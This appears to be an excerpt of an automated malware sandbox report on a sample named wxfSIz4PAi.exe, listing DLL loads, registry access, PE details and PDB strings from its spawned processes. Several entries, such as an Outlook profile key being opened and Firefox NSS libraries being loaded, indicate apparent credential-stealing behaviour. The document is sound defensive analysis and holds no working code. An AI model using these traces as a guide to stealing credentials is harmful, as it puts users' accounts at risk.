Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msctfui.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: wxfSIz4PAi.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: wxfSIz4PAi.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: wxfSIz4PAi.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: wxfSIz4PAi.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: wxfSIz4PAi.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: wxfSIz4PAi.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: wxfSIz4PAi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: u5ek.0.exe, 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920960862.000002727C8E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1866972606.0000000003900000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1867218514.0000000003DB7000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1866008850.00000000027BD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163183799.0000000005416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163536288.00000000058F0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292633080.000000000471F000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292037261.0000000004260000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: mozglue.pdb source: u5ek.0.exe, 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000000.1783099524.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1863586625.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000002.2259125869.000000000031C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913830974.000002721BAF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920246621.000002727C780000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1867767738.000000006C8A7000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 00000014.00000002.2293392231.000000006CCC7000.00000002.00000001.01000000.0000000A.sdmp
